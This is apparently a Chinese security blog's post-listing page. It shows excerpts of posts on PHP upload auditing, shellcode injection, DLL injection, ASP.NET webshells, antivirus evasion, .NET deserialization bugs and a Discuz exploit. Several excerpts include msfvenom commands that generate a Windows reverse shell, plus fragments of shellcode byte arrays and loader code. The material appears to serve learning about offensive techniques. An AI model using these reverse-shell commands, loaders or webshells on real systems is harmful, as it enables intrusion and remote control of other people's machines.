2021年2月4日
php代码审计指南-文件上传篇
摘要: 恢复内容开始 前言 回顾拓展 0X01首先我们来看一个文件上传的简单页面 <?php {if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo "url:".$_FILES["upfile"]["name"]; if(!file_exists($_FILES 阅读全文
posted @ 2021-02-04 13:54 yourse1f 阅读(376) 评论(0) 推荐(0) 编辑
将shellcode注入本地进程
摘要: 这次我们来学习一下将shellcode注入本地进程内存并切执行的经典方法 首先生成我们的shellcode msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.104 LPORT=443 -f c -b \x00\x0a\x0d roo 阅读全文
posted @ 2021-02-04 13:53 yourse1f 阅读(648) 评论(0) 推荐(0) 编辑
使用windowsAPI 加载shellcode
摘要: msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f c -b \x00\x0a\x0d 这是一个简单的注入本地进程的代码 #include "stdafx.h"#include <Windows.h>i 阅读全文
posted @ 2021-02-04 13:51 yourse1f 阅读(329) 评论(0) 推荐(0) 编辑
DLL注入
摘要: dll其实就是c++的class 因为cpp只能有一个主函数 所以dll随之而来 这里的源码 #ifdef CREATEDELL_API_DU #else #define CREATEDELL_API_DU _declspec(dllimport) //当编译时,头文件不参加编译,所以.cpp文件中 阅读全文
posted @ 2021-02-04 13:48 yourse1f 阅读(263) 评论(0) 推荐(0) 编辑
shellcode注入原理
摘要: unsigned char buf[] = "\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d\x05\xef\xff" "\xff\xff\x48\xbb\xec\x91\x66\x93\xd5\xdb\x11\xd7\x48\x31\x58" "\ 阅读全文
posted @ 2021-02-04 13:47 yourse1f 阅读(355) 评论(0) 推荐(0) 编辑
asp.net学习之路--c#asp.net小马
摘要: 先写一个小马 using System;using System.Web;using System.IO;using System.Diagnostics;using System.Net;namespace Recmdy{ public partial class Recmd { public R 阅读全文
posted @ 2021-02-04 13:44 yourse1f 阅读(405) 评论(0) 推荐(0) 编辑
asp.net学习--asmx一句话木马
摘要: Web Service是一个基于可编程的web的应用程序,用于开发分布式的互操作的应用程序,也是一种web服务,Web Service的主要目标是跨平台的可互操作性,为了实现这一目标Web Service 完全基于XML(可扩展标记语言)、XSD(XML Schema)等独立于平台、独立于软件供应商 阅读全文
posted @ 2021-02-04 13:43 yourse1f 阅读(1525) 评论(0) 推荐(0) 编辑
asp.net学习--svc一句话木马
摘要: tip--01了解什么叫WCF WCF (WindowsCommunication Foundation) 是微软为构建面向服务的应用程序所提供的统一编程模型,能够解决不同应用程序域,不同平台之间的通信问题。WCF统一了多重分布式技术:Webservice、.NetRemoting、.Net企业服务 阅读全文
posted @ 2021-02-04 13:41 yourse1f 阅读(369) 评论(0) 推荐(0) 编辑
php--莫客服系统代码审计(已申请CNVD)
摘要: 1绕过登录进入后台 可以看见这里先验证是否存在service_token如果存在则进入admin/index/index方法 我们跟进查看 index是继承base的根据经验一般来说这些东西都是验证之类的 跟进果不其然 可以看见他这里uid的获取方法很奇怪是根据一个加密函数来获取的 我们看看这个方法 阅读全文
posted @ 2021-02-04 13:40 yourse1f 阅读(471) 评论(0) 推荐(0) 编辑
csharp免杀实战-1
摘要: using System; using System.IO; using System.Runtime.InteropServices; using System.Text.RegularExpressions; using System.Security.Cryptography; using S 阅读全文
posted @ 2021-02-04 13:37 yourse1f 阅读(255) 评论(0) 推荐(0) 编辑
.net学习--Json.net
摘要: 在Newtonsoft.Json中使用JSONSerializer可以非常方便的实现.NET对象与Json之间的转化,JSONSerializer把.NET对象的属性名转化为Json数据中的Key,把对象的属性值转化为Json数据中的Value 我们还是先来了解json和net对象之间的转换Newt 阅读全文
posted @ 2021-02-04 13:34 yourse1f 阅读(435) 评论(0) 推荐(0) 编辑
通过CreateThreadpoolWait执行Shellcode
摘要: #include <windows.h> #include <threadpoolapiset.h> unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" "\x51\x5 阅读全文
posted @ 2021-02-04 13:33 yourse1f 阅读(453) 评论(0) 推荐(0) 编辑
.net学习--Fastjson反序列漏洞
摘要: download https://www.nuget.org/packages/fastJSON/2.3.1 首先还是看看fastjson的序列化和反序列化 <%@ Page Language="C#" AutoEventWireup="true" %> <%@ Import Namespace=" 阅读全文
posted @ 2021-02-04 13:32 yourse1f 阅读(505) 评论(0) 推荐(0) 编辑
.net JavaScriptSerializer反序列化漏洞
摘要: net中的javascriptserializer 在.NET处理 Ajax应用的时候,通常序列化功能由JavaScriptSerializer类提供,它是.NET2.0之后内部实现的序列化功能的类,位于命名空间System.Web.Script.Serialization、通过System.Web 阅读全文
posted @ 2021-02-04 13:30 yourse1f 阅读(1668) 评论(0) 推荐(0) 编辑
windows discuz exploit
摘要: 前提如果目标存在数据库备份 则可以通过windows短文件名得到备份sql文件 cmd dir /x可以看见短文件名 利用爆破下载 这里笔者写了一个检验脚本 use python3 time.py 2020-12-1 2020-12-21 http://192.168.1.104 1 import 阅读全文
posted @ 2021-02-04 13:29 yourse1f 阅读(383) 评论(0) 推荐(0) 编辑
java web安全(自定义Classloader)--服务器端动态解析二进制class文件
摘要: 参考 https://xz.aliyun.com/t/2744#reply-16082 首先要让服务端有动态地将字节流解析成Class的能力,这是基础。 正常情况下,Java并没有提供直接解析class字节数组的接口。不过classloader内部实现了一个protected的defineClass 阅读全文
posted @ 2021-02-04 13:27 yourse1f 阅读(276) 评论(0) 推荐(0) 编辑